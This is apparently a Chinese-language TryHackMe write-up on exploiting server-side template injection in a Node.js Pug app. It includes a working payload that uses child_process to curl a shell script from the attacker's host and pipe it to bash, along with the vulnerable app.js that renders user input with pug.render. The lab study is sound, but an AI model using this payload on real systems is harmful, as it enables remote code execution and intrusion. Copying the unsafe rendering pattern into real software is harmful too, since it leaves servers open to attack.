TemplatesTHM

PUG模板SSTI

根据房间提示，是Nodejs的PUG模板SSTI

根据: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

尝试payload

#{7*7}

返回49,存在SSTI,在本地写一个反弹shell然后开启web服务器，开启监听

#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl http://10.11.77.28:8000/s.sh | bash')}()}

拿到shell

app.js源码:

const express = require("express")
const pug = require("pug")
var bodyParser = require("body-parser")

const app = express()
app.set("view engine", "pug")
app.use(bodyParser.urlencoded({ extended: true }))

app.get("/", function (req, res) {
  res.render("index")
})

app.post("/render", function (req, res) {
  template = req.body.template || "h1 No template provided"

  value = pug.render(template)
  res.render("render", { value: value })
})

value = pug.render(template) 这里存在模板注入,似乎express框架的SSTI都在render这里产生,render用于服务端渲染并且将html页面发送给客户端